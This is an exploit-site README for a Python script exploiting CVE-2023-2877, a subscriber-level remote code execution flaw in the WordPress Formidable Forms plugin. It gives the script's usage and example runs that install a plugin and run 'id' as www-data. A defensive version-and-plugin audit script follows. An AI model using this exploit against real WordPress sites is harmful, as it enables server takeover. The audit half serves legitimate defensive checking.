## https://sploitus.com/exploit?id=626EC80C-304B-5B0D-A6AA-3D01CD03D528
# CVE-2023-2877
Formidable Forms < 6.3.1 - Subscriber+ Remote Code Execution


Usage
---

```
usage: CVE-2023-2877.py [-h] -w URL -u USERNAME -p PASSWORD [-pl PLUGIN] [-c CMD]

CVE-2023-2877 - Formidable Forms < 6.3.1 - Subscriber+ Remote Code Execution Script

options:
  -h, --help            show this help message and exit
  -w URL, --url URL     WordPress site URL
  -u USERNAME, --username USERNAME
                        WordPress username
  -p PASSWORD, --password PASSWORD
                        WordPress password
  -pl PLUGIN, --plugin PLUGIN
                        Different Plugin to Install i.e mstore-api.3.9.0.zip
  -c CMD, --cmd CMD     Command value
```

Example
---

```
$ python3 CVE-2023-2877.py -w http://wordpress.lan -u user -p useruser1
Successfully logged in.
Token extracted: 15157e0f4740e9d1bbccdc5edbef1292943daf7d064637de094b2af2e9364ee9262f985d41d1658d90f1387800d09e8269a93f6397333e61c13240ababb4648d
Plugin installed successfully.
Now run exploit script with --cmd / -c and command.
```

```
$ python3 CVE-2023-2877.py -w http://wordpress.lan -u user -p useruser1 -c id
Data:
[['uid=33(www-data) gid=33(www-data) groups=33(www-data)']]
```

Warning
---
YOU NEED TO UNINSTALL THE VULNERABLE PLUGIN User Post Gallery as it's got no authentication!
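
A defender-side check for the two conditions this README names, the Formidable Forms version bound and a leftover User Post Gallery install (an added example, not part of the exploit repository). The directory names `formidable` and `wp-upg` and the main file `formidable.php` are assumptions about how the plugins are laid out on disk, and the sample tree is constructed.

```python
import re
import tempfile
from pathlib import Path

FIXED = (6, 3, 1)               # from the title: Formidable Forms < 6.3.1
FORMIDABLE_SLUG = "formidable"  # assumption: plugin directory name
FORMIDABLE_MAIN = "formidable.php"  # assumption: file carrying the plugin header
LEFTOVER_SLUG = "wp-upg"        # assumption: User Post Gallery directory name

def parse_version(text):
    """Return the plugin header version as a tuple of ints, or None."""
    m = re.search(r"^[ \t/*#@]*Version:\s*([0-9]+(?:\.[0-9]+)*)", text, re.I | re.M)
    return tuple(int(p) for p in m.group(1).split(".")) if m else None

def is_vulnerable(version):
    """True when version is below FIXED; short versions are zero-padded (6.3 == 6.3.0)."""
    padded = tuple(version) + (0,) * (len(FIXED) - len(version))
    return padded < FIXED

def audit(plugins_dir):
    """Return a list of findings for one wp-content/plugins directory."""
    plugins = Path(plugins_dir)
    findings = []
    main = plugins / FORMIDABLE_SLUG / FORMIDABLE_MAIN
    if main.is_file():
        # The header sits at the top of the file, so the first 8 KiB is enough.
        head = main.read_text(encoding="utf-8", errors="replace")[:8192]
        version = parse_version(head)
        if version is None:
            findings.append("formidable: no Version header, check manually")
        elif is_vulnerable(version):
            shown = ".".join(map(str, version))
            findings.append("formidable %s is below 6.3.1, update it" % shown)
    if (plugins / LEFTOVER_SLUG).is_dir():
        findings.append("%s is installed, uninstall it if it was not deployed on purpose"
                        % LEFTOVER_SLUG)
    return findings

if __name__ == "__main__":
    # Constructed sample tree standing in for wp-content/plugins.
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / FORMIDABLE_SLUG).mkdir()
        (root / FORMIDABLE_SLUG / FORMIDABLE_MAIN).write_text(
            "<?php\n/*\n * Plugin Name: Formidable Forms\n * Version: 6.2.5\n */\n")
        (root / LEFTOVER_SLUG).mkdir()
        for finding in audit(root):
            print(finding)
```

On a real host, pass the site's `wp-content/plugins` path to `audit()`.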